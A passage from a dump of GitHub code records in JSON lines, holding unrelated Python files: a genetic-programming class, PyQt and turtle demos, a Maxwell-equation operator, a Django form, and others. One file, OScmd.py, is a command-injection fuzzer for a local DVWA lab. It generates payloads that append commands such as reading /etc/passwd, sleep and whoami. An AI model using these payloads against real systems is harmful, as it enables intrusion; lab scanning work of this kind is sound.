[]\n\tfor num, text in segments:\n\t\tPROGRESS_REPORT((num, text))\n\t\tstream = speech.synth(text)\n\t\tbuffers.append(stream)\n\t\tplay(stream)\n\tbuffer = b\"\".join(buffers)\n\tcache.store(text, buffer)\n\ndef stdin():\n\treturn speak(sys.stdin.readlines())\n\ndef clip():\n\treturn speak(pyperclip.paste())\n\nif __name__ == \"__main__\":\n\tspeak(\"Henlo, I am Borb.\")","repo_name":"maxsu/borb","sub_path":"borb/borb.py","file_name":"borb.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71389776166","text":"import random\nfrom utils import Utils\nfrom gpParser import GpParser\n\nclass Evolution(Utils):\n def __init__(self, state, fitness, config):\n self.state = state\n self.fitness = fitness\n self.config = config\n\n def _mutation(self, parent_index):\n parent_stack_copy = self.state.stack[parent_index][:]\n parent_stack_length = len(parent_stack_copy)\n \n for i in range(parent_stack_length):\n random_number = random.randint(0, 100)\n\n if random_number > self.config.mut_prob_per_node:\n continue\n\n token = parent_stack_copy[i]\n\n # If random token is a scope, input/output or equation, continue\n if (self.is_open_scope(token) or \n self.is_close_scope(token) or\n self.is_input(token) or\n self.is_output(token) or\n self.is_equation(token)\n ): \n continue\n\n elif self.is_operation(token):\n # Replace operation\n random_operation = self.choose_random_operation(token)\n parent_stack_copy[i] = random_operation\n # print(f\"Mutated operation to from {token} to {random_operation} at index {i}\")\n\n elif self.is_condition(token):\n # Replace condition\n random_condition = self.choose_random_condition(token)\n parent_stack_copy[i] = random_condition\n # print(f\"Mutated condition to from {token} to {random_condition} at index {i}\")\n \n \n elif self.is_if(token):\n # Replace if statement to while loop\n parent_stack_copy[i] = self.config.syntax['while']\n # print(f\"Mutated if statement to while loop at index {i}\")\n \n \n elif self.is_while(token):\n # Replace while loop to if statement\n parent_stack_copy[i] = self.config.syntax['if']\n # print(f\"Mutated while loop to if statement at index {i}\")\n \n elif self.is_logic(token):\n # Replace logic\n random_logic = self.choose_random_logic(token)\n parent_stack_copy[i] = random_logic\n # print(f\"Mutated logic from {token} to {random_logic} at index {i}\")\n\n elif self.is_constant(token):\n # Replace constant\n random_const = self.choose_random_const()\n parent_stack_copy[i] = random_const\n # print(f\"Mutated constant from {token} to {random_const} at index {i}\")\n\n elif self.is_variable(token):\n # Replace variable\n random_var_index = random.randint(0, len(self.state.variables[parent_index]) - 1)\n random_variable = self.state.variables[parent_index][random_var_index]\n parent_stack_copy[i] = random_variable\n # print(f\"Mutated variable from {token} to {random_variable} at index {i}\")\n\n\n return parent_stack_copy\n\n def _crossover(self, parent1_index, parent2_index):\n pass\n\n def _tournament(self):\n best = float('-inf')\n best_indiv_index = 0\n\n for _ in range(self.config.tournament_size):\n random_indiv_index = random.randint(0, self.config.population - 1)\n fitness = self.state.get_fitness(random_indiv_index)\n if fitness > best:\n best = fitness\n best_indiv_index = random_indiv_index\n \n return best_indiv_index\n \n def negative_tournament(self):\n worst = float('inf')\n worst_indiv_index = 0\n\n for _ in range(self.config.tournament_size):\n random_indiv_index = random.randint(0, self.config.population - 1)\n fitness = self.state.get_fitness(random_indiv_index)\n if fitness < worst:\n worst = fitness\n worst_indiv_index = random_indiv_index\n \n return worst_indiv_index\n \n def stats(self, g):\n fitness_avg = -sum(self.state.fitness) / len(self.state.fitness)\n best_fitness = max(self.state.fitness)\n best_indiv_index = self.state.fitness.index(best_fitness)\n best_indiv = self.state.stack[best_indiv_index]\n gpParser = GpParser(best_indiv)\n indiv = gpParser.parse()\n print(f\"Generation: {g} \\nAvg_fitness: {fitness_avg} \\nBest_fitness: {-best_fitness} \\nBest_individual: {indiv}\\n\")\n\n def problem_solved(self):\n best_indiv_index = self.state.fitness.index(0)\n best_indiv = self.state.stack[best_indiv_index]\n gpParser = GpParser(best_indiv)\n indiv = gpParser.parse()\n print(f\"\\n\\n\\nFound solution: {indiv}\\n\\n\")\n return 1 \n \n def evolve(self):\n for g in range(self.config.generations):\n self.stats(g)\n if max(self.state.fitness) == 0:\n return self.problem_solved()\n \n # print(f\"Generation {g}\")\n for i in range(self.config.population):\n evolution_type = self.get_random_evolution_type()\n\n if evolution_type == 'crossover':\n # print(f\"Individual {i} will be crossed over\")\n # TODO: What if parents are the same?\n parent1_index = self._tournament()\n parent2_index = self._tournament()\n continue\n pass\n\n elif evolution_type == 'mutation':\n indiv_index = self._tournament()\n new_indiv = self._mutation(indiv_index)\n\n new_fitness = self.fitness.fitness_function(new_indiv)\n\n # Get worst individual and replace it with new individual\n offspring_index = self.negative_tournament()\n self.state.replace_indiv(offspring_index, new_indiv, new_fitness)\n \n \n \n\n \n\n \n\n \n ","repo_name":"coado/gp_generator","sub_path":"evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":6101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7588493982","text":"#Creare una classe stella\r\n\r\nfrom random import randint\r\nimport turtle\r\n\r\nstella=turtle.Turtle()\r\ncielo=turtle.Screen()\r\n\r\nclass Stella():\r\n def __init__(self,x,y,n):\r\n self.x = x\r\n self.y = y\r\n self.n = n\r\n \r\n def disegna_stella(self):\r\n stella.speed(1000)\r\n stella.penup()\r\n stella.goto(self.x,self.y)\r\n stella.pendown()\r\n\r\n for _ in range(5):\r\n stella.forward(100)\r\n stella.right(144)\r\n \r\n\r\n\r\ndef main():\r\n for _ in range(50): \r\n s1 = Stella(randint(-400,400),randint(-400,400),5)\r\n s1.disegna_stella()\r\n \r\n cielo.exitonclick()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"alemigliore/Esercizi_python","sub_path":"python/Es_040_classeStella.py","file_name":"Es_040_classeStella.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37390135106","text":"def polindrom():\r\n for number in range(1, 2000): # 1 dan 2000 gacha bo'lgan sonlar (2000 kirmaydi)\r\n if str(number) == str(number)[::-1]: # agar satr teskarisi originaliga teng bo'lsa\r\n print(number) # aynan shu sikl takroridagi sonni chiqramiz\r\n\r\n# polindrom()\r\n\r\n\r\ndef sum_of_numbers():\r\n output = 0\r\n for number in range(1, 1000): # 1 dan 1000 gacha bo'lgan sonlar (1000 kirmaydi)\r\n if number % 3 == 0 and number % 5 == 0: # 3 va 5 ga bo'linishini tekshirish\r\n output += number # yig'indini hisoblash\r\n return output\r\n\r\n# print(sum_of_numbers())\r\n\r\n\r\ndef factorial(n):\r\n sum_of_factorial = 1\r\n for number in range(1, n+1): # n gacha bo'lgan sonlar\r\n sum_of_factorial = sum_of_factorial * number\r\n return sum_of_factorial\r\n\r\nprint(factorial(6))","repo_name":"jamshidyerzakov/ArticlesTranslated","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8667234997","text":"from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit\n\n\nclass Animal:\n def speak(self):\n pass\n\n\nclass Dog(Animal):\n def speak(self):\n return \"Woof!\"\n\n\nclass Cat(Animal):\n def speak(self):\n return \"Meow!\"\n\n\nclass AnimalFactory:\n @staticmethod\n def get_animal_classes():\n return {\n \"Dog\": Dog,\n \"Cat\": Cat\n }\n\n @staticmethod\n def create_animal(animal_type):\n animal_classes = AnimalFactory.get_animal_classes()\n animal_class = animal_classes.get(animal_type, None)\n return animal_class()\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Animal Factory\")\n self.layout = QVBoxLayout(self)\n self.animal_name = QLabel(\"Enter an animal name:\")\n self.animal_name_edit = QLineEdit()\n self.layout.addWidget(self.animal_name)\n self.layout.addWidget(self.animal_name_edit)\n self.create_buttons()\n self.result_label = QLabel()\n self.layout.addWidget(self.result_label)\n\n def create_buttons(self):\n button_layout = QHBoxLayout()\n self.layout.addLayout(button_layout)\n\n create_dog_btn = QPushButton(\"Create Dog\")\n create_dog_btn.clicked.connect(lambda: self.create_animal(\"Dog\"))\n button_layout.addWidget(create_dog_btn)\n\n create_cat_btn = QPushButton(\"Create Cat\")\n create_cat_btn.clicked.connect(lambda: self.create_animal(\"Cat\"))\n button_layout.addWidget(create_cat_btn)\n\n def create_animal(self, animal_type):\n animal = AnimalFactory.create_animal(animal_type)\n if animal:\n self.result_label.setText(animal.speak())\n\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n main_window = MainWindow()\n main_window.show()\n app.exec_()\n","repo_name":"syurskyi/Python_Topics","sub_path":"120_design_patterns/003_factories/pyqt/Factory_Method/004.py","file_name":"004.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37338193984","text":"import sys\n\ndef merge(N1:int,N2:int,A1:list[int],A2:list[int]):\n ANS = []\n for x in A1:\n ANS.append(x)\n for x in A2:\n ANS.append(x)\n return ANS\n\ninput_file = open(sys.argv[1],\"r\")\n\ntext = input_file.readlines()\n\nN1 = int(text[0].strip().split()[0])\nN2 = int(text[0].strip().split()[1])\n\nA1 = [int(x.strip()) for x in text[1].split()[0:N1]]\nA2 = [int(x.strip()) for x in text[1].split()[N1:N1+N2]]\n\nprint(merge(N1,N2,A1,A2))\n","repo_name":"basu-abhinav/automatic_program_evaluation","sub_path":"merge_arrays/merge_2.py","file_name":"merge_2.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34392175930","text":"\"\"\"grudge operators modelling electromagnetic phenomena.\"\"\"\n\n__copyright__ = \"\"\"\nCopyright (C) 2007-2017 Andreas Kloeckner\nCopyright (C) 2010 David Powell\nCopyright (C) 2017 Bogdan Enache\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nfrom pytools import memoize_method\n\nfrom grudge.models import HyperbolicOperator\nfrom meshmode.mesh import BTAG_ALL, BTAG_NONE\nfrom grudge import sym\nfrom pytools.obj_array import flat_obj_array, make_obj_array\n\n\nclass MaxwellOperator(HyperbolicOperator):\n \"\"\"A strong-form 3D Maxwell operator which supports fixed or variable\n isotropic, non-dispersive, positive epsilon and mu.\n\n Field order is [Ex Ey Ez Hx Hy Hz].\n \"\"\"\n\n _default_dimensions = 3\n\n def __init__(self, epsilon, mu,\n flux_type,\n bdry_flux_type=None,\n pec_tag=BTAG_ALL,\n pmc_tag=BTAG_NONE,\n absorb_tag=BTAG_NONE,\n incident_tag=BTAG_NONE,\n incident_bc=lambda maxwell_op, e, h: 0, current=0, dimensions=None):\n \"\"\"\n :arg flux_type: can be in [0,1] for anything between central and upwind,\n or \"lf\" for Lax-Friedrichs\n :arg epsilon: can be a number, for fixed material throughout the\n computation domain, or a TimeConstantGivenFunction for spatially\n variable material coefficients\n :arg mu: can be a number, for fixed material throughout the computation\n domain, or a TimeConstantGivenFunction for spatially variable material\n coefficients\n :arg incident_bc_getter: a function of signature *(maxwell_op, e, h)* that\n accepts *e* and *h* as a symbolic object arrays\n returns a symbolic expression for the incident\n boundary condition\n \"\"\"\n\n self.dimensions = dimensions or self._default_dimensions\n\n space_subset = [True]*self.dimensions + [False]*(3-self.dimensions)\n\n e_subset = self.get_eh_subset()[0:3]\n h_subset = self.get_eh_subset()[3:6]\n\n from grudge.tools import SubsettableCrossProduct\n self.space_cross_e = SubsettableCrossProduct(\n op1_subset=space_subset,\n op2_subset=e_subset,\n result_subset=h_subset)\n self.space_cross_h = SubsettableCrossProduct(\n op1_subset=space_subset,\n op2_subset=h_subset,\n result_subset=e_subset)\n\n self.epsilon = epsilon\n self.mu = mu\n\n from pymbolic.primitives import is_constant\n self.fixed_material = is_constant(epsilon) and is_constant(mu)\n\n self.flux_type = flux_type\n if bdry_flux_type is None:\n self.bdry_flux_type = flux_type\n else:\n self.bdry_flux_type = bdry_flux_type\n\n self.pec_tag = pec_tag\n self.pmc_tag = pmc_tag\n self.absorb_tag = absorb_tag\n self.incident_tag = incident_tag\n\n self.current = current\n self.incident_bc_data = incident_bc\n\n def flux(self, w):\n \"\"\"The numerical flux for variable coefficients.\n\n :param flux_type: can be in [0,1] for anything between central and upwind,\n or \"lf\" for Lax-Friedrichs.\n\n As per Hesthaven and Warburton page 433.\n \"\"\"\n\n normal = sym.normal(w.dd, self.dimensions)\n\n if self.fixed_material:\n e, h = self.split_eh(w)\n epsilon = self.epsilon\n mu = self.mu\n\n Z_int = (mu/epsilon)**0.5 # noqa: N806\n Y_int = 1/Z_int # noqa: N806\n Z_ext = (mu/epsilon)**0.5 # noqa: N806\n Y_ext = 1/Z_ext # noqa: N806\n\n if self.flux_type == \"lf\":\n # if self.fixed_material:\n # max_c = (self.epsilon*self.mu)**(-0.5)\n\n return flat_obj_array(\n # flux e,\n 1/2*(\n -self.space_cross_h(normal, h.ext-h.int)\n # multiplication by epsilon undoes material divisor below\n #-max_c*(epsilon*e.int - epsilon*e.ext)\n ),\n # flux h\n 1/2*(\n self.space_cross_e(normal, e.ext-e.int)\n # multiplication by mu undoes material divisor below\n #-max_c*(mu*h.int - mu*h.ext)\n ))\n elif isinstance(self.flux_type, (int, float)):\n # see doc/maxima/maxwell.mac\n return flat_obj_array(\n # flux e,\n (\n -1/(Z_int+Z_ext)*self.space_cross_h(normal,\n Z_ext*(h.ext-h.int)\n - self.flux_type*self.space_cross_e(normal, e.ext-e.int))\n ),\n # flux h\n (\n 1/(Y_int + Y_ext)*self.space_cross_e(normal,\n Y_ext*(e.ext-e.int)\n + self.flux_type*self.space_cross_h(normal, h.ext-h.int))\n ),\n )\n else:\n raise ValueError(\"maxwell: invalid flux_type (%s)\"\n % self.flux_type)\n\n def local_derivatives(self, w):\n \"\"\"Template for the spatial derivatives of the relevant components of\n :math:`E` and :math:`H`\n \"\"\"\n\n e, h = self.split_eh(w)\n\n nabla = sym.nabla(self.dimensions)\n\n def e_curl(field):\n return self.space_cross_e(nabla, field)\n\n def h_curl(field):\n return self.space_cross_h(nabla, field)\n\n # in conservation form: u_t + A u_x = 0\n return flat_obj_array(\n (self.current - h_curl(h)),\n e_curl(e)\n )\n\n def pec_bc(self, w):\n \"\"\"Construct part of the flux operator template for PEC boundary conditions\n \"\"\"\n e, h = self.split_eh(w)\n\n pec_e = sym.cse(sym.project(\"vol\", self.pec_tag)(e))\n pec_h = sym.cse(sym.project(\"vol\", self.pec_tag)(h))\n\n return flat_obj_array(-pec_e, pec_h)\n\n def pmc_bc(self, w):\n \"\"\"Construct part of the flux operator template for PMC boundary conditions\n \"\"\"\n e, h = self.split_eh(w)\n\n pmc_e = sym.cse(sym.project(\"vol\", self.pmc_tag)(e))\n pmc_h = sym.cse(sym.project(\"vol\", self.pmc_tag)(h))\n\n return flat_obj_array(pmc_e, -pmc_h)\n\n def absorbing_bc(self, w):\n \"\"\"Construct part of the flux operator template for 1st order\n absorbing boundary conditions.\n \"\"\"\n\n absorb_normal = sym.normal(self.absorb_tag, self.dimensions)\n\n e, h = self.split_eh(w)\n\n if self.fixed_material:\n epsilon = self.epsilon\n mu = self.mu\n\n absorb_Z = (mu/epsilon)**0.5 # noqa: N806\n absorb_Y = 1/absorb_Z # noqa: N806\n\n absorb_e = sym.cse(sym.project(\"vol\", self.absorb_tag)(e))\n absorb_h = sym.cse(sym.project(\"vol\", self.absorb_tag)(h))\n\n bc = flat_obj_array(\n absorb_e + 1/2*(self.space_cross_h(absorb_normal, self.space_cross_e(\n absorb_normal, absorb_e))\n - absorb_Z*self.space_cross_h(absorb_normal, absorb_h)),\n absorb_h + 1/2*(\n self.space_cross_e(absorb_normal, self.space_cross_h(\n absorb_normal, absorb_h))\n + absorb_Y*self.space_cross_e(absorb_normal, absorb_e)))\n\n return bc\n\n def incident_bc(self, w):\n \"\"\"Flux terms for incident boundary conditions\"\"\"\n # NOTE: Untested for inhomogeneous materials, but would usually be\n # physically meaningless anyway (are there exceptions to this?)\n\n e, h = self.split_eh(w)\n\n from grudge.tools import count_subset\n fld_cnt = count_subset(self.get_eh_subset())\n\n from grudge.tools import is_zero\n incident_bc_data = self.incident_bc_data(self, e, h)\n if is_zero(incident_bc_data):\n return make_obj_array([0]*fld_cnt)\n else:\n return sym.cse(-incident_bc_data)\n\n def sym_operator(self, w=None):\n \"\"\"The full operator template - the high level description of\n the Maxwell operator.\n\n Combines the relevant operator templates for spatial\n derivatives, flux, boundary conditions etc.\n \"\"\"\n from grudge.tools import count_subset\n w = sym.make_sym_array(\"w\", count_subset(self.get_eh_subset()))\n\n elec_components = count_subset(self.get_eh_subset()[0:3])\n mag_components = count_subset(self.get_eh_subset()[3:6])\n\n if self.fixed_material:\n # need to check this\n material_divisor = (\n [self.epsilon]*elec_components+[self.mu]*mag_components)\n\n tags_and_bcs = [\n (self.pec_tag, self.pec_bc(w)),\n (self.pmc_tag, self.pmc_bc(w)),\n (self.absorb_tag, self.absorbing_bc(w)),\n (self.incident_tag, self.incident_bc(w)),\n ]\n\n def flux(pair):\n return sym.project(pair.dd, \"all_faces\")(self.flux(pair))\n\n return (\n - self.local_derivatives(w)\n - sym.InverseMassOperator()(sym.FaceMassOperator()(\n flux(sym.int_tpair(w))\n + sum(\n flux(sym.bv_tpair(tag, w, bc))\n for tag, bc in tags_and_bcs)\n ))) / material_divisor\n\n @memoize_method\n def partial_to_eh_subsets(self):\n \"\"\"Helps find the indices of the E and H components, which can vary\n depending on number of dimensions and whether we have a full/TE/TM\n operator.\n \"\"\"\n\n e_subset = self.get_eh_subset()[0:3]\n h_subset = self.get_eh_subset()[3:6]\n\n from grudge.tools import partial_to_all_subset_indices\n return tuple(partial_to_all_subset_indices(\n [e_subset, h_subset]))\n\n def split_eh(self, w):\n \"\"\"Splits an array into E and H components\"\"\"\n e_idx, h_idx = self.partial_to_eh_subsets()\n e, h = w[e_idx], w[h_idx]\n\n return e, h\n\n def get_eh_subset(self):\n \"\"\"Return a 6-tuple of :class:`bool` objects indicating whether field\n components are to be computed. The fields are numbered in the order\n specified in the class documentation.\n \"\"\"\n return 6*(True,)\n\n def max_eigenvalue_expr(self):\n \"\"\"Return the largest eigenvalue of Maxwell's equations as a hyperbolic\n system.\n \"\"\"\n from math import sqrt\n if self.fixed_material:\n return 1/sqrt(self.epsilon*self.mu) # a number\n else:\n import grudge.symbolic as sym\n return sym.NodalMax()(1/sym.FunctionSymbol(\"sqrt\")(self.epsilon*self.mu))\n\n def max_eigenvalue(self, t, fields=None, discr=None, context={}):\n if self.fixed_material:\n return self.max_eigenvalue_expr()\n else:\n raise ValueError(\"max_eigenvalue is no longer supported for \"\n \"variable-coefficient problems--use max_eigenvalue_expr\")\n\n def check_bc_coverage(self, mesh):\n from meshmode.mesh import check_bc_coverage\n check_bc_coverage(mesh, [\n self.pec_tag,\n self.pmc_tag,\n self.absorb_tag,\n self.incident_tag])\n\n\nclass TMMaxwellOperator(MaxwellOperator):\n \"\"\"A 2D TM Maxwell operator with PEC boundaries.\n\n Field order is [Ez Hx Hy].\n \"\"\"\n\n _default_dimensions = 2\n\n def get_eh_subset(self):\n return (\n (False, False, True) # only ez\n + (True, True, False) # hx and hy\n )\n\n\nclass TEMaxwellOperator(MaxwellOperator):\n \"\"\"A 2D TE Maxwell operator.\n\n Field order is [Ex Ey Hz].\n \"\"\"\n\n _default_dimensions = 2\n\n def get_eh_subset(self):\n return (\n (True, True, False) # ex and ey\n + (False, False, True) # only hz\n )\n\n\nclass TE1DMaxwellOperator(MaxwellOperator):\n \"\"\"A 1D TE Maxwell operator.\n\n Field order is [Ex Ey Hz].\n \"\"\"\n\n _default_dimensions = 1\n\n def get_eh_subset(self):\n return (\n (True, True, False)\n + (False, False, True)\n )\n\n\nclass SourceFree1DMaxwellOperator(MaxwellOperator):\n \"\"\"A 1D TE Maxwell operator.\n\n Field order is [Ey Hz].\n \"\"\"\n\n _default_dimensions = 1\n\n def get_eh_subset(self):\n return (\n (False, True, False)\n + (False, False, True)\n )\n\n\ndef get_rectangular_cavity_mode(E_0, mode_indices): # noqa: N803\n \"\"\"A rectangular TM cavity mode for a rectangle / cube\n with one corner at the origin and the other at (1,1[,1]).\"\"\"\n dims = len(mode_indices)\n if dims != 2 and dims != 3:\n raise ValueError(\"Improper mode_indices dimensions\")\n import numpy\n\n factors = [n*numpy.pi for n in mode_indices]\n\n kx, ky = factors[0:2]\n if dims == 3:\n kz = factors[2]\n\n omega = numpy.sqrt(sum(f**2 for f in factors))\n\n nodes = sym.nodes(dims)\n x = nodes[0]\n y = nodes[1]\n if dims == 3:\n z = nodes[2]\n\n sx = sym.sin(kx*x)\n cx = sym.cos(kx*x)\n sy = sym.sin(ky*y)\n cy = sym.cos(ky*y)\n if dims == 3:\n sz = sym.sin(kz*z)\n cz = sym.cos(kz*z)\n\n if dims == 2:\n tfac = sym.ScalarVariable(\"t\") * omega\n\n result = flat_obj_array(\n 0,\n 0,\n sym.sin(kx * x) * sym.sin(ky * y) * sym.cos(tfac), # ez\n -ky * sym.sin(kx * x) * sym.cos(ky * y) * sym.sin(tfac) / omega, # hx\n kx * sym.cos(kx * x) * sym.sin(ky * y) * sym.sin(tfac) / omega, # hy\n 0,\n )\n else:\n tdep = sym.exp(-1j * omega * sym.ScalarVariable(\"t\"))\n\n gamma_squared = ky**2 + kx**2\n result = flat_obj_array(\n -kx * kz * E_0*cx*sy*sz*tdep / gamma_squared, # ex\n -ky * kz * E_0*sx*cy*sz*tdep / gamma_squared, # ey\n E_0 * sx*sy*cz*tdep, # ez\n\n -1j * omega * ky*E_0*sx*cy*cz*tdep / gamma_squared, # hx\n 1j * omega * kx*E_0*cx*sy*cz*tdep / gamma_squared,\n 0,\n )\n\n return result\n","repo_name":"VincentWells/grudge","sub_path":"grudge/models/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":15216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32384698864","text":"\n\nfrom django import forms\n\nfrom .models import Documento, Estado\nfrom zonas.models import Barrio\n\n\nclass DocumentoForm(forms.ModelForm): \n\n nomenclatura = forms.CharField(label=\"Nomenclatura\", required=True)\n descripcion = forms.CharField(label=\"Descripcion\", required=True)\n estado = forms.ModelChoiceField(\n queryset=Estado.objects.all().order_by('descripcion'), \n label=\"Estado\",\n required=True\n )\n fechaestado = forms.DateField(\n label=\"Fecha Estado\", required=False)\n \n barrio = forms.ModelMultipleChoiceField(\n widget = forms.SelectMultiple,\n queryset = Barrio.objects.all().order_by('descripcion')\n )\n\n referenciadescriptiva = forms.CharField(label=\"Referencia Auxiliar\", required=False)\n\n def __init__(self, *args, **kwargs):\n super(DocumentoForm, self).__init__(*args, **kwargs)\n for field in iter(self.fields):\n print(field)\n if field != 'barrio':\n self.fields[field].widget.attrs.update({\n 'class': 'pure-input-1'\n })\n\n class Meta:\n model = Documento\n fields = ['nomenclatura', 'descripcion', 'estado', 'fechaestado',\n 'barrio' ]\n\n","repo_name":"baroam0/expedientes","sub_path":"documentos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72043161766","text":"'''\nOS command injection tool\nthực hiện detect vul này dựa trên 2 kỹ thuật: \n + result-base\n + time-base\nđối với result base thì chúng ta chỉ cần thực hiện gửi những đầu ra sẽ hiển thị lỗi ví dụ: echo \"xyz\", python -c ....\nđối với time-base ta sẽ thực hiện truyền các câu lệnh sleep(x), delay(x), ... Tính thời gian phản hồi của response để detect\n2 Hệ điều hành: windows và linux\n Tổng cộng có 4 cái schema\nPayload được tham khảo từ Payload all the thíngs\n'''\nfrom connect import connect\nfrom a import simple_grammar_fuzzer\n\ndetect_etc_passwd = {\"root:x:x\", \"www-data:x:33:33\", \"/root:/bin/bash\", \"nologin\"}\ndetect_echo = {\"This is fking test arg\"}\ndetect_whoami = {\"www-data\"}\nclass cmd():\n\n '''\n def __init__(self):\n self.detect_etc_passwd = {\"root:x:x\", \"www-data:x:33:33\", \"/root:/bin/bash\", \"nologin\"}\n self.detect_echo = {\"This is fking test arg\"}\n self.detect_whoami = {\"www-data\"}\n '''\n\n def generator(self, GRAMMAR):\n return set([simple_grammar_fuzzer(GRAMMAR, \"<\", \">\", '<start>') for i in range(10)])\n\n def result_base_generator(self):\n result_based = {\n \"<start>\" : [\"<quote><command>\"],\n \"<quote>\" : [\"|\",\";\" ,\"&&\" , \"&\", \"%0a\"],\n \"<command>\" : [\"<echo><spaceEcho><echoArgument>\", \"<cat><spaceCat><catArgument>\"],\n \"<echo>\" : [\"echo\", \"e\\'c\\'h\\'o\", \"e\\\"c\\\"h\\\"o\", \"ech$@o\"],\n \"<cat>\" : [\"cat\", \"c\\'a\\'t\", \"c\\\"a\\\"t\", \"ca$@t\"],\n \"<spaceEcho>\" : [\" \", \" -e \", \"%20\"],\n \"<spaceCat>\" : [\"<\", \"$IFS\", \" \", \"%20\"],\n \"<echoArgument>\" : [\"This is fking test arg\"],\n \"<catArgument>\" : [\n \"/etc/passwd\", \"\\\"\\x2f\\x65\\x74\\x63\\x2f\\x70\\x61\\x73\\x73\\x77\\x64\\\"\" , \n \"${HOME:0:1}etc${HOME:0:1}passwd\", \"$(echo . | tr '!-0' '\\\"-1')etc$(echo . | tr '!-0' '\\\"-1')passwd\"\n ]\n }\n return self.generator(result_based)\n\n def time_base_generator(self):\n time_based = {\n \"<start>\" : [\"<quote><command>\"],\n \"<quote>\" : [\"|\", \";\"],\n \"<command>\" : [\"timeout<space><time>\", \"delay<space><time>\", \"sleep<space><time>\", \"dir\"],\n \"<space>\" : [\" \", \"%20\"],\n \"<time>\" : [\"5\"]\n }\n return self.generator(time_based)\n\n def another_command(self):\n another = {\n \"<start>\" : [\"<quote><command>\"],\n \"<command>\" : [\"dir\", \"ls\", \"id\", \"i'd'\", \"i\\\"d\\\"\" \"w'h'o'a'm'i'\", \"w\\\"h\\\"o\\\"a\\\"m\\\"i\\\"\" \"'u'n'a'm'e' -a\", \"\\\"u\\\"n\\\"a\\\"m\\\"e\\\" -a\"],\n \"<quote>\" : [\"|\", \";\", \"&&\", \"&\"]\n }\n return self.generator(another)\n\n \n def scan(self,url, method, params, cookies):\n import random\n import time\n j = 0\n \n payloads = self.time_base_generator()\n payloads.update(self.another_command())\n payloads.update(self.result_base_generator())\n payloadList = list(payloads)\n for payload in payloads:\n if j == 5:\n break\n x = random.randrange(0, len(payloads))\n check = self.scanner_oscmd(url, method, params, cookies, payloadList[x])\n j = j + 1\n if check == 1:\n return 0\n time.sleep(2)\n\n \n\n def scanner_oscmd(self, url, method, params, cookies, payload):\n import time\n status_code = 500\n r = None\n content = None\n status_code = 200\n conn = connect()\n\n start = time.time \n\n # Cần phải truyền thêm parameter vào để phục vụ cho chức năng post\n if method == \"GET\" or method == \"get\":\n url = url+ payload # nối chuỗi nào! \n r = conn.gett(url, params, payload, cookies)\n if method == \"POST\" or method== \"post\": \n r = conn.postt(url, params, payload, cookies)\n\n content = str(r.content)\n\n check = 0\n for i in detect_etc_passwd:\n if i in content:\n check = 1\n if check == 1:\n print(\"OS command injection: \" + url)\n return 1\n \n\n for i in detect_echo:\n if (i in content) and (payload in content):\n return 0\n if i in content:\n print(\"OS command injection: \" + url)\n return 1\n \n\n end = time.time\n if end == 5:\n print (\"time-base command injection\")\n return 1\n return 0\nfrom crawler import crawler\n\na = cmd()\ncookie = {\"PHPSESSID\" : \"f2c280e624310d43cafd4cebf90a1768\", \"security\": \"low\"}\ncrawl = crawler(\"http://localhost/dvwa/\", [] ,cookie)\nlistedCrawl = crawl.run_crawler()\n\nfor i in listedCrawl:\n print(i)\n\n\n\n\n ","repo_name":"nguyenanh1997/Fuzzz","sub_path":"1Fuzz_copy/OScmd.py","file_name":"OScmd.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20152359554","text":"\"\"\"\nimplement a program in Python that prompts the user for mass as an integer (in kilograms) \nand then outputs the equivalent number of Joules as an integer. Assume that the user \nwill input an integer.\n\"\"\"\ndef Calculate_energy ():\n m = int(input(\"enter the mass in kilogram: \"))\n c = (3 * 10**8)**2\n E = m*c\n print(\"Energy in 